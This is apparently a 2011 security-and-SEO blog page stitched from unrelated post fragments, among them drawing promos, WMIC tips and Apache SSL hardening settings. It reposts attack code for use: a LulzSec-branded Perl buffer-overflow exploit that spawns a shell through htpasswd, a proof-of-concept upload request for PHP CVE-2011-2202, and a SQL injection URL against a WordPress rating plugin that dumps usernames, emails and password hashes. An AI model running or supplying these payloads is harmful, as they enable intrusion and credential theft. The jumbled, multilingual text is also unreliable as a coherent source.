Hi guys, today, it’s a commercial post: i’d like to announce you a new project: The ultimate free drawing and graphics website!
Impressive drawing tools and brilliant advise from devquotes team. This project is related to free vector drawing. The software you are goind to see are 100% free and is yours to keep so download it now and start imaginating great draws. Read the rest of this entry
Today i was asking myself if there was any other kind of backlink than in HTML
after a loooong afternoon sepnt in playing PES and thinking about SEO, i thought about :
L’art de maniement du crayon et du papier peut s’avérer utile dans beaucoup domaine artistiques et littéraires. Nous avons tous, à un moment de notre vie, tenté de schématiser quelque chose sur le papier. Que ce soit grâce à un croquis, une petite esquisse ou une ébauche, cette représentation schématique passait par un dessin couché sur un papier.
You should know about that but extracting windows configuration is something very boring. mspaint.exe, screenshot + crop. HORRIBLE.
A good way to extract some information is to use the WMIC utility.
The wmic is a core feature of all Windows since Windows 2000 and most of the commercial monitoring software are using it to extract, analyze and display system information :
Here is a little list of actions you can perform through WMIC utility :
You may have heard about the new DDOS tools released by THc yesterday exploiting an OLD CVE :
here is how to protect yourlsef from the vulnerability :
Just edit your SSL configuration files ( or all your vhost files, depend your configuration) as follows:
SSLVerifyDepth 4 # max number of depth
SSLVerifyClient none (ou require)
SSLCipherSuite RC4-SHA:RC4-MD5:HIGH:MEDIUM:!ADH:!DSS:!SSLv2:+3DES # Ciphers suite used in the renegociation
SSLProtocol all -SSLv2 # Let’s disable sslv2
SSLHonorCipherOrder on #using the order we just set
have fun @patching your apache configuration files !
Just like we did for Quora (http://www.devquotes.com/2011/01/06/providing-quora-com-invitations/), we will provide any invitations needed for those who totally want to try this already famous Google+ :)
Just follow the steps:
Today the famous group just released one of the many 0day they’re using :
You got here the code :)
RC: irc.lulzco.org (channel #LulzSec | port 6697 for SSL)
BitCoin donations: 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP
Twitter: @LulzSec
Contact us: 614-LULZSEC
. /$$ /$$ /$$$$$$
.| $$ | $$ /$$__ $$
.| $$ /$$ /$$| $$ /$$$$$$$$| $$ \__/ /$$$$$$ /$$$$$$$
.| $$ | $$ | $$| $$|____ /$$/| $$$$$$ /$$__ $$ /$$_____/
.| $$ | $$ | $$| $$ /$$$$/ \____ $$| $$$$$$$$| $$
.| $$ | $$ | $$| $$ /$$__/ /$$ \ $$| $$_____/| $$
.| $$$$$$$$| $$$$$$/| $$ /$$$$$$$$| $$$$$$/| $$$$$$$| $$$$$$.$
.|________/ \______/ |__/|________/ \______/ \_______/ \_______/
//Laughing at your security since 2011!
.-- .-""-.
. ) ( )
. ( ) (
. / )
. (_ _) 0_,-.__
. (_ )_ |_.-._/
. ( ) |lulz..\
. (__) |__--_/
. |'' ``\ |
. | [Lulz] \ | /b/
. | \ ,,,---===?A`\ | ,==y'
. ___,,,,,---==""\ |M] \ | ;|\ |>
. _ _ \ ___,|H,,---==""""bno,
. o O (_) (_) \ / _ AWAW/
. / _(+)_ dMM/
. \@_,,,,,,---==" \ \\|// MW/
.--''''" === d/
. // SET SAIL FOR FAIL!
. ,'_________________________
. \ \ \ \ ,/~~~~~~~~~~~~~~~~~~~~~~~~~~~
. _____ ,' ~~~ .-""-.~~~~~~ .-""-.
. .-""-. ///==--- /`-._ ..-' -.__..-'
. `-.__..-' =====\\\\\\ V/ .---\.
. ~~~~~~~~~~~~, _',--/_.\ .-""-.
. .-""-.___` -- \| -.__..-
Greetings Lulz Lizards, it is finally time we released our 0 day apache exploit, use the cannons swiftly and let our enemy's be overwhelmed with our Lulz!
===========================================
#!/usr/bin/perl
# 0 Day Apache Exploit
# LulzSecurity #AntiSec
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
PHP is prone to a security-bypass vulnerability.Successful exploits will allow an attacker to delete files from the root directory, which may aid in further attacks.
PHP 5.3.6 is vulnerable; other versions may also be affected.
Webmasters are advised to manually patch their PHP installations after a serious flaw allowing attackers to potentially delete files from their root directories was publicly disclosed.
The vulnerability lies in the « SAPI_POST_HANDLER_FUNC() » function in rfc1867.c and can be exploited to append forward or back slashes before the file name during an upload. This allows an attacker, for example, to delete files from the root directory or can be combined with other vulnerabilities to enhance attacks. The flaw is described as an input validation error and security bypass issue. Vulnerability research vendor Secunia rates it as « less critical. » A Polish web application developer named Krzysztof Kotowicz is credited with discovering and reporting the issue, but even though it was patched on June 12, details about the flaw have been available online since May 27.
The vulnerability, identified as CVE-2011-2202, affects PHP 5.3.6 and earlier versions. No new package has been released yet, but a patch can be grabbed from the repository and applied manually. The vulnerability does not require authentication, and has a partial impact on system integrity. System confidentiality are affected too.
It’s still unclear whether its access complexity should be low, as listed in an IBM XSS Force advisory, or high, as considered by the Red Hat security team.
Exploit found on pastebin.com
HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=———-ThIs_Is_tHe_bouNdaRY_$
content-length: 200
————ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name= »contents »; filename= »/anything.here.slash-will-pass »;
Content-Type: text/plain
any
————ThIs_Is_tHe_bouNdaRY_$–
HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html
/anything.here.slash-will-pass
PHP script:
=====
if (!empty($_FILES['contents'])) { // process file upload
echo $_FILES['contents']['name'];
unlink($_FILES['contents']['tmp_name']);
}
Served as found on the interweb :
WordPress « wp star rating » plugin SQL injection
http://yourwordpress/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0×535242,1,1,co
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0×20,2000)),1,2000),0x223b7d),1,1,1+limit+1
Last posts